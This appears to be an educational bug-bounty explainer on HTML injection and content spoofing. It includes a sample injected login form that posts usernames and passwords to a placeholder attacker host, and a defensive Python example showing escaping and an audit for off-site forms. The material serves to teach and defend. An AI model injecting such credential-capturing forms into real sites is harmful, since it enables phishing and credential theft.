Hypertext Markup Language (HTML) injection and content spoofing are attacks that allow a malicious user to inject content into a site’s web pages. The attacker can inject HTML elements of their own design, most commonly as a <form> tag that mimics a legitimate login screen in order to trick targets into submitting sensitive information to a malicious site.

By Hackfreaks official.

Because these types of attacks rely on fooling targets (a practice sometimes called social engineering), bug bounty programs view content spoofing and HTML injection as less severe than other vulnerabilities covered in this book.

An HTML injection vulnerability occurs when a website allows an attacker to submit HTML tags, typically via some form input or URL parameters, which are then rendered directly on the web page. This is similar to cross-site scripting attacks, except those injections allow for the execution of malicious JavaScript.

HTML injection is sometimes referred to as virtual defacement. That’s because developers use the HTML language to define the structure of a web page. So if an attacker can inject HTML and the site renders it, the attacker can change what a page looks like. This technique of tricking users into submitting sensitive information through a fake form is referred to as phishing.

For example, if a page renders content that you can control, you might be able to add a <form> tag to the page asking the user to reenter their username and password, like this:

➊ <form method='POST' action='http://<attacker>.com/capture.php' id='login-form'>
    <input type='text' name='username' value=''>
    <input type='password' name='password' value=''>
    <input type='submit' value='submit'>
  </form>

When a user submits this form, the information is sent to an attacker’s website http://<attacker>.com/capture.php via an action attribute ➊.

Content spoofing is very similar to HTML injection except attackers can only inject plaintext, not HTML tags. This limitation is typically caused by sites either escaping any included HTML or HTML tags being stripped when the server sends the HTTP response. Although attackers can’t format the web page with content spoofing, they might be able to insert text, such as a message, that looks as though it’s legitimate site content. Such messages can fool targets into performing an action but rely heavily on social engineering.
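The difference between the two cases above, as an added example that is not part of the original text: the same user input rendered raw and rendered escaped, with a small audit that lists any form posting to another host. SITE_HOST, the function names and the collector.invalid sample value are assumptions made for the illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "example.com"  # assumed hostname of the legitimate site


def render_unsafe(comment):
    # Vulnerable: user input is concatenated into the page as-is,
    # so any tags it contains become part of the document.
    return "<div class='comment'>" + comment + "</div>"


def render_escaped(comment):
    # Hardened: <, >, & and quotes become entities, so tags show up as text.
    # Plain text still passes through, which is the content spoofing case.
    return "<div class='comment'>" + html.escape(comment, quote=True) + "</div>"


class FormAudit(HTMLParser):
    """Collects the action attribute of every <form> the parser sees."""

    def __init__(self):
        super().__init__()
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.form_actions.append(dict(attrs).get("action") or "")


def offsite_forms(page):
    """Return form actions in page that post to a host other than SITE_HOST."""
    audit = FormAudit()
    audit.feed(page)
    # Relative or empty actions have no hostname and stay on the site.
    return [url for url in audit.form_actions
            if urlparse(url).hostname not in (None, SITE_HOST)]


# Constructed input modelled on the form shown earlier; the host is a placeholder.
SAMPLE = ("<form method='POST' action='http://collector.invalid/capture.php'>"
          "<input type='password' name='password'></form>")

if __name__ == "__main__":
    print("raw    :", offsite_forms(render_unsafe(SAMPLE)))
    print("escaped:", offsite_forms(render_escaped(SAMPLE)))
```

The audit can be run over rendered pages in a test suite to catch a template that stops escaping a user-controlled field.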
